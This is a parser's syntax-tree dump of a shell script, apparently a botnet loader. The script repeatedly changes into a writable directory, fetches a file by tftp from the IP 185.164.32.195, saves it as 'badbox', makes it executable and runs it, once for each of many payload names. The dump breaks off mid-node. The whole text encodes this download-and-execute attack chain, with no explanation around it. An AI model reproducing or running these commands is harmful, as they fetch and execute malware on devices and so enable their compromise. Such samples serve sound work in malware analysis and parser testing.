CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 170), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 134), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 123), word='185.164.32.195'),
    WordNode(lineno=4, pos=(124, 126), word='-c'),
    WordNode(lineno=4, pos=(127, 130), word='get'),
    WordNode(lineno=4, pos=(131, 134), word='sdd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(134, 135)),
  CommandNode(lineno=4, pos=(135, 150), parts=[
    WordNode(lineno=4, pos=(135, 138), word='cat'),
    WordNode(lineno=4, pos=(139, 142), word='sdd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(144, 150), word='badbox'), pos=(143, 150), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(150, 151)),
  CommandNode(lineno=4, pos=(151, 161), parts=[
    WordNode(lineno=4, pos=(151, 156), word='chmod'),
    WordNode(lineno=4, pos=(157, 159), word='+x'),
    WordNode(lineno=4, pos=(160, 161), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(161, 162)),
  CommandNode(lineno=4, pos=(162, 170), parts=[
    WordNode(lineno=4, pos=(162, 170), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(171, 294), parts=[
  CommandNode(lineno=5, pos=(171, 178), parts=[
    WordNode(lineno=5, pos=(171, 173), word='cd'),
    WordNode(lineno=5, pos=(174, 178), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(179, 181)),
  CommandNode(lineno=5, pos=(182, 193), parts=[
    WordNode(lineno=5, pos=(182, 184), word='cd'),
    WordNode(lineno=5, pos=(185, 193), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(194, 196)),
  CommandNode(lineno=5, pos=(197, 204), parts=[
    WordNode(lineno=5, pos=(197, 199), word='cd'),
    WordNode(lineno=5, pos=(200, 204), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(205, 207)),
  CommandNode(lineno=5, pos=(208, 216), parts=[
    WordNode(lineno=5, pos=(208, 210), word='cd'),
    WordNode(lineno=5, pos=(211, 216), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(217, 219)),
  CommandNode(lineno=5, pos=(220, 224), parts=[
    WordNode(lineno=5, pos=(220, 222), word='cd'),
    WordNode(lineno=5, pos=(223, 224), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(224, 225)),
  CommandNode(lineno=5, pos=(226, 257), parts=[
    WordNode(lineno=5, pos=(226, 230), word='tftp'),
    WordNode(lineno=5, pos=(231, 245), word='185.164.32.195'),
    WordNode(lineno=5, pos=(246, 248), word='-c'),
    WordNode(lineno=5, pos=(249, 252), word='get'),
    WordNode(lineno=5, pos=(253, 257), word='asss'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(257, 258)),
  CommandNode(lineno=5, pos=(258, 274), parts=[
    WordNode(lineno=5, pos=(258, 261), word='cat'),
    WordNode(lineno=5, pos=(262, 266), word='asss'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(268, 274), word='badbox'), pos=(267, 274), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(274, 275)),
  CommandNode(lineno=5, pos=(275, 285), parts=[
    WordNode(lineno=5, pos=(275, 280), word='chmod'),
    WordNode(lineno=5, pos=(281, 283), word='+x'),
    WordNode(lineno=5, pos=(284, 285), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(285, 286)),
  CommandNode(lineno=5, pos=(286, 294), parts=[
    WordNode(lineno=5, pos=(286, 294), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(295, 418), parts=[
  CommandNode(lineno=6, pos=(295, 302), parts=[
    WordNode(lineno=6, pos=(295, 297), word='cd'),
    WordNode(lineno=6, pos=(298, 302), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(303, 305)),
  CommandNode(lineno=6, pos=(306, 317), parts=[
    WordNode(lineno=6, pos=(306, 308), word='cd'),
    WordNode(lineno=6, pos=(309, 317), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(318, 320)),
  CommandNode(lineno=6, pos=(321, 328), parts=[
    WordNode(lineno=6, pos=(321, 323), word='cd'),
    WordNode(lineno=6, pos=(324, 328), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(329, 331)),
  CommandNode(lineno=6, pos=(332, 340), parts=[
    WordNode(lineno=6, pos=(332, 334), word='cd'),
    WordNode(lineno=6, pos=(335, 340), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(341, 343)),
  CommandNode(lineno=6, pos=(344, 348), parts=[
    WordNode(lineno=6, pos=(344, 346), word='cd'),
    WordNode(lineno=6, pos=(347, 348), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(348, 349)),
  CommandNode(lineno=6, pos=(350, 381), parts=[
    WordNode(lineno=6, pos=(350, 354), word='tftp'),
    WordNode(lineno=6, pos=(355, 369), word='185.164.32.195'),
    WordNode(lineno=6, pos=(370, 372), word='-c'),
    WordNode(lineno=6, pos=(373, 376), word='get'),
    WordNode(lineno=6, pos=(377, 381), word='sdff'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(381, 382)),
  CommandNode(lineno=6, pos=(382, 398), parts=[
    WordNode(lineno=6, pos=(382, 385), word='cat'),
    WordNode(lineno=6, pos=(386, 390), word='sdff'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(392, 398), word='badbox'), pos=(391, 398), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(398, 399)),
  CommandNode(lineno=6, pos=(399, 409), parts=[
    WordNode(lineno=6, pos=(399, 404), word='chmod'),
    WordNode(lineno=6, pos=(405, 407), word='+x'),
    WordNode(lineno=6, pos=(408, 409), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(409, 410)),
  CommandNode(lineno=6, pos=(410, 418), parts=[
    WordNode(lineno=6, pos=(410, 418), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(419, 542), parts=[
  CommandNode(lineno=7, pos=(419, 426), parts=[
    WordNode(lineno=7, pos=(419, 421), word='cd'),
    WordNode(lineno=7, pos=(422, 426), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(427, 429)),
  CommandNode(lineno=7, pos=(430, 441), parts=[
    WordNode(lineno=7, pos=(430, 432), word='cd'),
    WordNode(lineno=7, pos=(433, 441), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(442, 444)),
  CommandNode(lineno=7, pos=(445, 452), parts=[
    WordNode(lineno=7, pos=(445, 447), word='cd'),
    WordNode(lineno=7, pos=(448, 452), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(453, 455)),
  CommandNode(lineno=7, pos=(456, 464), parts=[
    WordNode(lineno=7, pos=(456, 458), word='cd'),
    WordNode(lineno=7, pos=(459, 464), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(465, 467)),
  CommandNode(lineno=7, pos=(468, 472), parts=[
    WordNode(lineno=7, pos=(468, 470), word='cd'),
    WordNode(lineno=7, pos=(471, 472), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(472, 473)),
  CommandNode(lineno=7, pos=(474, 505), parts=[
    WordNode(lineno=7, pos=(474, 478), word='tftp'),
    WordNode(lineno=7, pos=(479, 493), word='185.164.32.195'),
    WordNode(lineno=7, pos=(494, 496), word='-c'),
    WordNode(lineno=7, pos=(497, 500), word='get'),
    WordNode(lineno=7, pos=(501, 505), word='fgfd'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(505, 506)),
  CommandNode(lineno=7, pos=(506, 522), parts=[
    WordNode(lineno=7, pos=(506, 509), word='cat'),
    WordNode(lineno=7, pos=(510, 514), word='fgfd'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(516, 522), word='badbox'), pos=(515, 522), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(522, 523)),
  CommandNode(lineno=7, pos=(523, 533), parts=[
    WordNode(lineno=7, pos=(523, 528), word='chmod'),
    WordNode(lineno=7, pos=(529, 531), word='+x'),
    WordNode(lineno=7, pos=(532, 533), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(533, 534)),
  CommandNode(lineno=7, pos=(534, 542), parts=[
    WordNode(lineno=7, pos=(534, 542), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(543, 666), parts=[
  CommandNode(lineno=8, pos=(543, 550), parts=[
    WordNode(lineno=8, pos=(543, 545), word='cd'),
    WordNode(lineno=8, pos=(546, 550), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(551, 553)),
  CommandNode(lineno=8, pos=(554, 565), parts=[
    WordNode(lineno=8, pos=(554, 556), word='cd'),
    WordNode(lineno=8, pos=(557, 565), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(566, 568)),
  CommandNode(lineno=8, pos=(569, 576), parts=[
    WordNode(lineno=8, pos=(569, 571), word='cd'),
    WordNode(lineno=8, pos=(572, 576), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(577, 579)),
  CommandNode(lineno=8, pos=(580, 588), parts=[
    WordNode(lineno=8, pos=(580, 582), word='cd'),
    WordNode(lineno=8, pos=(583, 588), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(589, 591)),
  CommandNode(lineno=8, pos=(592, 596), parts=[
    WordNode(lineno=8, pos=(592, 594), word='cd'),
    WordNode(lineno=8, pos=(595, 596), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(596, 597)),
  CommandNode(lineno=8, pos=(598, 629), parts=[
    WordNode(lineno=8, pos=(598, 602), word='tftp'),
    WordNode(lineno=8, pos=(603, 617), word='185.164.32.195'),
    WordNode(lineno=8, pos=(618, 620), word='-c'),
    WordNode(lineno=8, pos=(621, 624), word='get'),
    WordNode(lineno=8, pos=(625, 629), word='gfgd'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(629, 630)),
  CommandNode(lineno=8, pos=(630, 646), parts=[
    WordNode(lineno=8, pos=(630, 633), word='cat'),
    WordNode(lineno=8, pos=(634, 638), word='gfgd'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(640, 646), word='badbox'), pos=(639, 646), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(646, 647)),
  CommandNode(lineno=8, pos=(647, 657), parts=[
    WordNode(lineno=8, pos=(647, 652), word='chmod'),
    WordNode(lineno=8, pos=(653, 655), word='+x'),
    WordNode(lineno=8, pos=(656, 657), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(657, 658)),
  CommandNode(lineno=8, pos=(658, 666), parts=[
    WordNode(lineno=8, pos=(658, 666), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(667, 792), parts=[
  CommandNode(lineno=9, pos=(667, 674), parts=[
    WordNode(lineno=9, pos=(667, 669), word='cd'),
    WordNode(lineno=9, pos=(670, 674), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(675, 677)),
  CommandNode(lineno=9, pos=(678, 689), parts=[
    WordNode(lineno=9, pos=(678, 680), word='cd'),
    WordNode(lineno=9, pos=(681, 689), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(690, 692)),
  CommandNode(lineno=9, pos=(693, 700), parts=[
    WordNode(lineno=9, pos=(693, 695), word='cd'),
    WordNode(lineno=9, pos=(696, 700), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(701, 703)),
  CommandNode(lineno=9, pos=(704, 712), parts=[
    WordNode(lineno=9, pos=(704, 706), word='cd'),
    WordNode(lineno=9, pos=(707, 712), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(713, 715)),
  CommandNode(lineno=9, pos=(716, 720), parts=[
    WordNode(lineno=9, pos=(716, 718), word='cd'),
    WordNode(lineno=9, pos=(719, 720), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(720, 721)),
  CommandNode(lineno=9, pos=(722, 754), parts=[
    WordNode(lineno=9, pos=(722, 726), word='tftp'),
    WordNode(lineno=9, pos=(727, 741), word='185.164.32.195'),
    WordNode(lineno=9, pos=(742, 744), word='-c'),
    WordNode(lineno=9, pos=(745, 748), word='get'),
    WordNode(lineno=9, pos=(749, 754), word='ssaaa'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(754, 755)),
  CommandNode(lineno=9, pos=(755, 772), parts=[
    WordNode(lineno=9, pos=(755, 758), word='cat'),
    WordNode(lineno=9, pos=(759, 764), word='ssaaa'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(766, 772), word='badbox'), pos=(765, 772), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(772, 773)),
  CommandNode(lineno=9, pos=(773, 783), parts=[
    WordNode(lineno=9, pos=(773, 778), word='chmod'),
    WordNode(lineno=9, pos=(779, 781), word='+x'),
    WordNode(lineno=9, pos=(782, 783), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(783, 784)),
  CommandNode(lineno=9, pos=(784, 792), parts=[
    WordNode(lineno=9, pos=(784, 792), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(793, 918), parts=[
  CommandNode(lineno=10, pos=(793, 800), parts=[
    WordNode(lineno=10, pos=(793, 795), word='cd'),
    WordNode(lineno=10, pos=(796, 800), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(801, 803)),
  CommandNode(lineno=10, pos=(804, 815), parts=[
    WordNode(lineno=10, pos=(804, 806), word='cd'),
    WordNode(lineno=10, pos=(807, 815), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(816, 818)),
  CommandNode(lineno=10, pos=(819, 826), parts=[
    WordNode(lineno=10, pos=(819, 821), word='cd'),
    WordNode(lineno=10, pos=(822, 826), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(827, 829)),
  CommandNode(lineno=10, pos=(830, 838), parts=[
    WordNode(lineno=10, pos=(830, 832), word='cd'),
    WordNode(lineno=10, pos=(833, 838), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(839, 841)),
  CommandNode(lineno=10, pos=(842, 846), parts=[
    WordNode(lineno=10, pos=(842, 844), word='cd'),
    WordNode(lineno=10, pos=(845, 846), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(846, 847)),
  CommandNode(lineno=10, pos=(848, 880), parts=[
    WordNode(lineno=10, pos=(848, 852), word='tftp'),
    WordNode(lineno=10, pos=(853, 867), word='185.164.32.195'),
    WordNode(lineno=10, pos=(868, 870), word='-c'),
    WordNode(lineno=10, pos=(871, 874), word='get'),
    WordNode(lineno=10, pos=(875, 880), word='swerf'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(880, 881)),
  CommandNode(lineno=10, pos=(881, 898), parts=[
    WordNode(lineno=10, pos=(881, 884), word='cat'),
    WordNode(lineno=10, pos=(885, 890), word='swerf'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(892, 898), word='badbox'), pos=(891, 898), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(898, 899)),
  CommandNode(lineno=10, pos=(899, 909), parts=[
    WordNode(lineno=10, pos=(899, 904), word='chmod'),
    WordNode(lineno=10, pos=(905, 907), word='+x'),
    WordNode(lineno=10, pos=(908, 909), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(909, 910)),
  CommandNode(lineno=10, pos=(910, 918), parts=[
    WordNode(lineno=10, pos=(910, 918), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(919, 1042), parts=[
  CommandNode(lineno=11, pos=(919, 926), parts=[
    WordNode(lineno=11, pos=(919, 921), word='cd'),
    WordNode(lineno=11, pos=(922, 926), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(927, 929)),
  CommandNode(lineno=11, pos=(930, 941), parts=[
    WordNode(lineno=11, pos=(930, 932), word='cd'),
    WordNode(lineno=11, pos=(933, 941), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(942, 944)),
  CommandNode(lineno=11, pos=(945, 952), parts=[
    WordNode(lineno=11, pos=(945, 947), word='cd'),
    WordNode(lineno=11, pos=(948, 952), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(953, 955)),
  CommandNode(lineno=11, pos=(956, 964), parts=[
    WordNode(lineno=11, pos=(956, 958), word='cd'),
    WordNode(lineno=11, pos=(959, 964), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(965, 967)),
  CommandNode(lineno=11, pos=(968, 972), parts=[
    WordNode(lineno=11, pos=(968, 970), word='cd'),
    WordNode(lineno=11, pos=(971, 972), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(972, 973)),
  CommandNode(lineno=11, pos=(974, 1005), parts=[
    WordNode(lineno=11, pos=(974, 978), word='tftp'),
    WordNode(lineno=11, pos=(979, 993), word='185.164.32.195'),
    WordNode(lineno=11, pos=(994, 996), word='-c'),
    WordNode(lineno=11, pos=(997, 1000), word='get'),
    WordNode(lineno=11, pos=(1001, 1005), word='ggbv'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1005, 1006)),
  CommandNode(lineno=11, pos=(1006, 1022), parts=[
    WordNode(lineno=11, pos=(1006, 1009), word='cat'),
    WordNode(lineno=11, pos=(1010, 1014), word='ggbv'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1016, 1022), word='badbox'), pos=(1015, 1022), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1022, 1023)),
  CommandNode(lineno=11, pos=(1023, 1033), parts=[
    WordNode(lineno=11, pos=(1023, 1028), word='chmod'),
    WordNode(lineno=11, pos=(1029, 1031), word='+x'),
    WordNode(lineno=11, pos=(1032, 1033), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1033, 1034)),
  CommandNode(lineno=11, pos=(1034, 1042), parts=[
    WordNode(lineno=11, pos=(1034, 1042), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1043, 1166), parts=[
  CommandNode(lineno=12, pos=(1043, 1050), parts=[
    WordNode(lineno=12, pos=(1043, 1045), word='cd'),
    WordNode(lineno=12, pos=(1046, 1050), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1051, 1053)),
  CommandNode(lineno=12, pos=(1054, 1065), parts=[
    WordNode(lineno=12, pos=(1054, 1056), word='cd'),
    WordNode(lineno=12, pos=(1057, 1065), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1066, 1068)),
  CommandNode(lineno=12, pos=(1069, 1076), parts=[
    WordNode(lineno=12, pos=(1069, 1071), word='cd'),
    WordNode(lineno=12, pos=(1072, 1076), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1077, 1079)),
  CommandNode(lineno=12, pos=(1080, 1088), parts=[
    WordNode(lineno=12, pos=(1080, 1082), word='cd'),
    WordNode(lineno=12, pos=(1083, 1088), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1089, 1091)),
  CommandNode(lineno=12, pos=(1092, 1096), parts=[
    WordNode(lineno=12, pos=(1092, 1094), word='cd'),
    WordNode(lineno=12, pos=(1095, 1096), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1096, 1097)),
  CommandNode(lineno=12, pos=(1098, 1129), parts=[
    WordNode(lineno=12, pos=(1098, 1102), word='tftp'),
    WordNode(lineno=12, pos=(1103, 1117), word='185.164.32.195'),
    WordNode(lineno=12, pos=(1118, 1120), word='-c'),
    WordNode(lineno=12, pos=(1121, 1124), word='get'),
    WordNode(lineno=12, pos=(1125, 1129), word='dffd'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1129, 1130)),
  CommandNode(lineno=12, pos=(1130, 1146), parts=[
    WordNode(lineno=12, pos=(1130, 1133), word='cat'),
    WordNode(lineno=12, pos=(1134, 1138), word='dffd'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1140, 1146), word='badbox'), pos=(1139, 1146), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1146, 1147)),
  CommandNode(lineno=12, pos=(1147, 1157), parts=[
    WordNode(lineno=12, pos=(1147, 1152), word='chmod'),
    WordNode(lineno=12, pos=(1153, 1155), word='+x'),
    WordNode(lineno=12, pos=(1156, 1157), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1157, 1158)),
  CommandNode(lineno=12, pos=(1158, 1166), parts=[
    WordNode(lineno=12, pos=(1158, 1166), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1167, 1290), parts=[
  CommandNode(lineno=13, pos=(1167, 1174), parts=[
    WordNode(lineno=13, pos=(1167, 1169), word='cd'),
    WordNode(lineno=13, pos=(1170, 1174), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1175, 1177)),
  CommandNode(lineno=13, pos=(1178, 1189), parts=[
    WordNode(lineno=13, pos=(1178, 1180), word='cd'),
    WordNode(lineno=13, pos=(1181, 1189), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1190, 1192)),
  CommandNode(lineno=13, pos=(1193, 1200), parts=[
    WordNode(lineno=13, pos=(1193, 1195), word='cd'),
    WordNode(lineno=13, pos=(1196, 1200), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1201, 1203)),
  CommandNode(lineno=13, pos=(1204, 1212), parts=[
    WordNode(lineno=13, pos=(1204, 1206), word='cd'),
    WordNode(lineno=13, pos=(1207, 1212), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1213, 1215)),
  CommandNode(lineno=13, pos=(1216, 1220), parts=[
    WordNode(lineno=13, pos=(1216, 1218), word='cd'),
    WordNode(lineno=13, pos=(1219, 1220), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1220, 1221)),
  CommandNode(lineno=13, pos=(1222, 1253), parts=[
    WordNode(lineno=13, pos=(1222, 1226), word='tftp'),
    WordNode(lineno=13, pos=(1227, 1241), word='185.164.32.195'),
    WordNode(lineno=13, pos=(1242, 1244), word='-c'),
    WordNode(lineno=13, pos=(1245, 1248), word='get'),
    WordNode(lineno=13, pos=(1249, 1253), word='dsds'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1253, 1254)),
  CommandNode(lineno=13, pos=(1254, 1270), parts=[
    WordNode(lineno=13, pos=(1254, 1257), word='cat'),
    WordNode(lineno=13, pos=(1258, 1262), word='dsds'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1264, 1270), word='badbox'), pos=(1263, 1270), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1270, 1271)),
  CommandNode(lineno=13, pos=(1271, 1281), parts=[
    WordNode(lineno=13, pos=(1271, 1276), word='chmod'),
    WordNode(lineno=13, pos=(1277, 1279), word='+x'),
    WordNode(lineno=13, pos=(1280, 1281), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1281, 1282)),
  CommandNode(lineno=13, pos=(1282, 1290), parts=[
    WordNode(lineno=13, pos=(1282, 1290), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1291, 1412), parts=[
  CommandNode(lineno=14, pos=(1291, 1298), parts=[
    WordNode(lineno=14, pos=(1291, 1293), word='cd'),
    WordNode(lineno=14, pos=(1294, 1298), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1299, 1301)),
  CommandNode(lineno=14, pos=(1302, 1313), parts=[
    WordNode(lineno=14, pos=(1302, 1304), word='cd'),
    WordNode(lineno=14, pos=(1305, 1313), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1314, 1316)),
  CommandNode(lineno=14, pos=(1317, 1324), parts=[
    WordNode(lineno=14, pos=(1317, 1319), word='cd'),
    WordNode(lineno=14, pos=(1320, 1324), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1325, 1327)),
  CommandNode(lineno=14, pos=(1328, 1336), parts=[
    WordNode(lineno=14, pos=(1328, 1330), word='cd'),
    WordNode(lineno=14, pos=(1331, 1336), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1337, 1339)),
  CommandNode(lineno=14, pos=(1340, 1344), parts=[
    WordNode(lineno=14, pos=(1340, 1342), word='cd'),
    WordNode(lineno=14, pos=(1343, 1344), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1344, 1345)),
  CommandNode(lineno=14, pos=(1346, 1376), parts=[
    WordNode(lineno=14, pos=(1346, 1350), word='tftp'),
    WordNode(lineno=14, pos=(1351, 1365), word='185.164.32.195'),
    WordNode(lineno=14, pos=(1366, 1368), word='-c'),
    WordNode(lineno=14, pos=(1369, 1372), word='get'),
    WordNode(lineno=14, pos=(1373, 1376), word='zxc'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1376, 1377)),
  CommandNode(lineno=14, pos=(1377, 1392), parts=[
    WordNode(lineno=14, pos=(1377, 1380), word='cat'),
    WordNode(lineno=14, pos=(1381, 1384), word='zxc'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1386, 1392), word='badbox'), pos=(1385, 1392), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1392, 1393)),
  CommandNode(lineno=14, pos=(1393, 1403), parts=[
    WordNode(lineno=14, pos=(1393, 1398), word='chmod'),
    WordNode(lineno=14, pos=(1399, 1401), word='+x'),
    WordNode(lineno=14, pos=(1402, 1403), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1403, 1404)),
  CommandNode(lineno=14, pos=(1404, 1412), parts=[
    WordNode(lineno=14, pos=(1404, 1412), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1413, 1534), parts=[
  CommandNode(lineno=15, pos=(1413, 1420), parts=[
    WordNode(lineno=15, pos=(1413, 1415), word='cd'),
    WordNode(lineno=15, pos=(1416, 1420), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1421, 1423)),
  CommandNode(lineno=15, pos=(1424, 1435), parts=[
    WordNode(lineno=15, pos=(1424, 1426), word='cd'),
    WordNode(lineno=15, pos=(1427, 1435), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1436, 1438)),
  CommandNode(lineno=15, pos=(1439, 1446), parts=[
    WordNode(lineno=15, pos=(1439, 1441), word='cd'),
    WordNode(lineno=15, pos=(1442, 1446), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1447, 1449)),
  CommandNode(lineno=15, pos=(1450, 1458), parts=[
    WordNode(lineno=15, pos=(1450, 1452), word='cd'),
    WordNode(lineno=15, pos=(1453, 1458), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1459, 1461)),
  CommandNode(lineno=15, pos=(1462, 1466), parts=[
    WordNode(lineno=15, pos=(1462, 1464), word='cd'),
    WordNode(lineno=15, pos=(1465, 1466), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1466, 1467)),
  CommandNode(lineno=15, pos=(1468, 1498), parts=[
    WordNode(lineno=15, pos=(1468, 1472), word='tftp'),
    WordNode(lineno=15, pos=(1473, 1487), word='185.164.32.195'),
    WordNode(lineno=15, pos=(1488, 1490), word='-c'),
    WordNode(lineno=15, pos=(1491, 1494), word='get'),
    WordNode(lineno=15, pos=(1495, 1498), word='vcx'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1498, 1499)),
  CommandNode(lineno=15, pos=(1499, 1514), parts=[
    WordNode(lineno=15, pos=(1499, 1502), word='cat'),
    WordNode(lineno=15, pos=(1503, 1506), word='vcx'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1508, 1514), word='badbox'), pos=(1507, 1514), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1514, 1515)),
  CommandNode(lineno=15, pos=(1515, 1525), parts=[
    WordNode(lineno=15, pos=(1515, 1520), word='chmod'),
    WordNode(lineno=15, pos=(1521, 1523), word='+x'),
